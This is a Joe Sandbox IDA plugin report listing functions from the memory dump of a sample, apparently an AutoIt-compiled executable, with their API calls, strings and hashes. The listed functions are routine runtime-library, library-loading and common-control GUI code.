Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: fb74c364912b81e49d7cdad37a2d57dca55f28fe9e04651362a0ddd3066a6996
Instruction ID: c0ac8f3d9a51ea372ee3eb4a34e595ca9ecf6d6e00ffd4d2fdc9faecd62e52e9
Opcode Fuzzy Hash: fb74c364912b81e49d7cdad37a2d57dca55f28fe9e04651362a0ddd3066a6996
Instruction Fuzzy Hash: 2F918C71109745DFC718EF24D889C6EB7B8FF89740F00491EF5869B2A1EA28EE45CB52

Function 007F524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007F52DD

Part of subcall function 00800340: __87except.LIBCMT ref: 0080037B

Strings

pow, xrefs: 007F52B5, 007F52D2

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 99064e632c8591c8d1105251b95f6115c7a60fb4511f29eaa6bb7009df37930e
Instruction ID: b0f4833d7a176b075aa99fc01d02bfe417a4b92b4763cf4da7ac93b4277b8420
Opcode Fuzzy Hash: 99064e632c8591c8d1105251b95f6115c7a60fb4511f29eaa6bb7009df37930e
Instruction Fuzzy Hash: DA515A61A0DE0987C7517728CD4137E2B94FF00758F244A59E395C63EAEF788CD49E8A

Function 007F023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 007F0277
#, xrefs: 007F0280

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: ccff769fb96db928e87aa33b92b868a73d8f2f40534ddeac4b1ddf3deef6359b
Instruction ID: 4a00ee6ed930d6ddcc3b74be66e4ffdc81a72b0a4bf853efda7c1dbb631c1aa0
Opcode Fuzzy Hash: ccff769fb96db928e87aa33b92b868a73d8f2f40534ddeac4b1ddf3deef6359b
Instruction Fuzzy Hash: 2451317514466ADFCF259F28D8886FA7BA4FF15310F14406AE9919B3A1D7389C82CBA0

Function 007E3297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007E33D7
_memmove.LIBCMT ref: 007E3470
_free.LIBCMT ref: 007E3496
_memmove.LIBCMT ref: 007E3549

Strings

Oa~, xrefs: 007E3482

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memmove$_free
String ID: Oa~
API String ID: 2620147621-1339823410
Opcode ID: 6be25dfff3144af0b7ce34da3569b58490c62a7a5b676a3f27af42cdf399edb8
Instruction ID: 94a23c2faa839fc1ec1f2fb84c24064dea94df357a959cc996f49cf3e3498b0e
Opcode Fuzzy Hash: 6be25dfff3144af0b7ce34da3569b58490c62a7a5b676a3f27af42cdf399edb8
Instruction Fuzzy Hash: 55516A716093819FDB24CF29C844B6ABBE5FF89314F04492DE98ACB351EB35D941CB92

Function 007E62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007E63A8
_memmove.LIBCMT ref: 007E6446
_memset.LIBCMT ref: 007E646A

Strings

ERCP, xrefs: 007E6313

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 6858e1da984319b9b5faf154c0dde9e9fb567afd06f7386443dc81b727b6583d
Instruction ID: 134ef10393b714e8215fb63b4e4f06248b742090733809126966b2f95ada2b12
Opcode Fuzzy Hash: 6858e1da984319b9b5faf154c0dde9e9fb567afd06f7386443dc81b727b6583d
Instruction Fuzzy Hash: 8151D471901399DBCB24CF55C885BAABBF4FF18354F20856EEA4AC7281E774D694CB40

Function 0082DA5D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0082DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0082DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0082DB8E

Strings

DllGetClassObject, xrefs: 0082DB01

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorMode$AddressProc
String ID: DllGetClassObject
API String ID: 1548245697-1075368562
Opcode ID: 65053a500d7f448ddbe9ab119c84e6248594d64fabdaf68f81a01d22f073a7b9
Instruction ID: 52c137c69b59ba54f8f316242701d818b459870f2ada98354d998a41b4ade025
Opcode Fuzzy Hash: 65053a500d7f448ddbe9ab119c84e6248594d64fabdaf68f81a01d22f073a7b9
Instruction Fuzzy Hash: 9A418EB1600328EFDB15CF64D884A9A7FA9FF44320F1580AAAD05DF246D7B1D984CBA0

Function 00857BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0085F910,00000000,?,?,?,?), ref: 00857C4E
GetWindowLongW.USER32 ref: 00857C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00857C7B

Strings

SysTreeView32, xrefs: 00857C20

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ed85b56ca4f50de5dd78b213d6d06708ba88fcaf5a0d9d4001661dbd21f27064
Instruction ID: d518275acdde43b16de491d78d4821f344150461b4ea8e9128b980ed35d72d1f
Opcode Fuzzy Hash: ed85b56ca4f50de5dd78b213d6d06708ba88fcaf5a0d9d4001661dbd21f27064
Instruction Fuzzy Hash: 6231DC31204206AADB219E38DC05BEA37A9FB44325F248725FD75E32E1D734AC558B50

Function 00857648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 008576D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 008576E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00857708

Strings

SysMonthCal32, xrefs: 0085769B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: d937d1c0b1cfb861aaca1e5297317f0c45fd8d702c64701bfea32d1227c71c12
Instruction ID: dd7a2d6bea048479d661d86803ea46899f8759aacb2eb544e73603a8f6424c13
Opcode Fuzzy Hash: d937d1c0b1cfb861aaca1e5297317f0c45fd8d702c64701bfea32d1227c71c12
Instruction Fuzzy Hash: D421BF32600219BBDF119EA4DC46FEA3BA9FB98724F110254FE15AB1D0D6B5A8548BA0

Function 00856F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00856FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00856FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00856FDF

Strings

Listbox, xrefs: 00856F77

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 35220eaba4dde6431a9e0afecec8ccafed48fe32bf0a803279ad2c55cfd219e3
Instruction ID: 1b3760343e8be5e7b63eeec837dacbea77ef69fb3a09d0f5d076884c6c88ebd4
Opcode Fuzzy Hash: 35220eaba4dde6431a9e0afecec8ccafed48fe32bf0a803279ad2c55cfd219e3
Instruction Fuzzy Hash: 8A21F232A10118BFDF118F54DC84EAB3BAAFF89761F418124FA04DB190DA71AC25CBA0

Function 0085797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 008579E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 008579F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00857A03

Strings

msctls_trackbar32, xrefs: 008579B8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 301c19a5c09bcd3d7e61005f432ed3933b824c0920090a776fd1d71a98500578
Instruction ID: 8999b4baa46d37e687ed6d6f0baa300a530e638c1b9ed3733adb7e3972ef654a
Opcode Fuzzy Hash: 301c19a5c09bcd3d7e61005f432ed3933b824c0920090a776fd1d71a98500578
Instruction Fuzzy Hash: 0711E332244208BBEF119F74DC05FAB3BA9FFC9B65F014529FA41A6091D271A811CB60

Function 0084C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00811D88,?), ref: 0084C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0084C324

Strings

kernel32.dll, xrefs: 0084C30D
GetSystemWow64DirectoryW, xrefs: 0084C31E

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: bc3e579afbb602661d4a41037dcf2efb434b32be7713e4bb71bad405843ea594
Instruction ID: b51a39eeaa77a6cdae3fd7da63b88f00ea2a79696a09910e88f61ebb7ad6fd52
Opcode Fuzzy Hash: bc3e579afbb602661d4a41037dcf2efb434b32be7713e4bb71bad405843ea594
Instruction Fuzzy Hash: 58E0C270201B03CFCB605F25C804A4676D8FF08356F80C439E995C23A0E778E840CB60

Function 007D4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007D4C2E), ref: 007D4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007D4CB5

Strings

kernel32.dll, xrefs: 007D4C9E
GetNativeSystemInfo, xrefs: 007D4CAF

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: c4e74a2233ee49eeacc39afd76ed4728e61e851d1c1b8a688682f93edb30de1d
Instruction ID: 1589b33cbc1cbaad42edb69066817f6f9e2d65b918fc1f3a625798b5d78b5031
Opcode Fuzzy Hash: c4e74a2233ee49eeacc39afd76ed4728e61e851d1c1b8a688682f93edb30de1d
Instruction Fuzzy Hash: F7D01230550723CFD7205F31DA1860676E5BF05792B11883A9995D6251E678D480C662

Function 007D4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007D4D2E,?,007D4F4F,?,008962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007D4D81

Strings

kernel32.dll, xrefs: 007D4D6A
Wow64DisableWow64FsRedirection, xrefs: 007D4D7B

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 7bb6fd10c4708998c933f5dfb3ba25fb01e93a27aa7b01d0cbad7f863489b6fe
Instruction ID: 569dfd0d6ec37b60ce922d8aa6164b042a215989eebaaf32472079337b853437
Opcode Fuzzy Hash: 7bb6fd10c4708998c933f5dfb3ba25fb01e93a27aa7b01d0cbad7f863489b6fe
Instruction Fuzzy Hash: 48D01730650B13CFD721AF31D80861676E9BF153A2B21883AAAA6D6350E678D880CA61

Function 007D4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,007D4CE1,?), ref: 007D4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007D4DB4

Strings

kernel32.dll, xrefs: 007D4D9D
Wow64RevertWow64FsRedirection, xrefs: 007D4DAE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 06b0ab884a701de5fb7601b960d49f78f310d4423e58b3d7f6fbbaf6dda18bb1
Instruction ID: a35f5d70db65c91bfac32b09e3964fbf8edc796c45383d3a49a806fb13e967e1
Opcode Fuzzy Hash: 06b0ab884a701de5fb7601b960d49f78f310d4423e58b3d7f6fbbaf6dda18bb1
Instruction Fuzzy Hash: 91D01731690B13DFD721AF31D808A467AF5FF05396B21883AEAE6D6250E778D880CA51

Function 00851072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,008512C1), ref: 00851080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00851092

Strings

advapi32.dll, xrefs: 0085107B
RegDeleteKeyExW, xrefs: 0085108C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 2535371917cd4a280f52493a9c1edf937423d262b3487749ec03c64de3484348
Instruction ID: ce19211256fb56a2caea6f5a4ef5b41ff60b027a32e1ec150781cbc2c856c244
Opcode Fuzzy Hash: 2535371917cd4a280f52493a9c1edf937423d262b3487749ec03c64de3484348
Instruction Fuzzy Hash: EED01230550B13CFD7206F75D85861676E5FF45392B118C39A8D5D7291D778C4C0C750

Function 008493F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00849009,?,0085F910), ref: 00849403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00849415

Strings

GetModuleHandleExW, xrefs: 0084940F
kernel32.dll, xrefs: 008493FE

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 31d0ff5ae8fd149715334dc4d0332d6443f90cb972d9d074721a411b97a71012
Instruction ID: a3b4d9f0a82a778b2d8709ff0a882b67de71ce612522c025ae8ff09a7d4f92f8
Opcode Fuzzy Hash: 31d0ff5ae8fd149715334dc4d0332d6443f90cb972d9d074721a411b97a71012
Instruction Fuzzy Hash: B7D01734550B17CFD720AF31DA0D60776E6FF15392B11C83AE9E6D6691EA78C880CB51

Function 008276C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

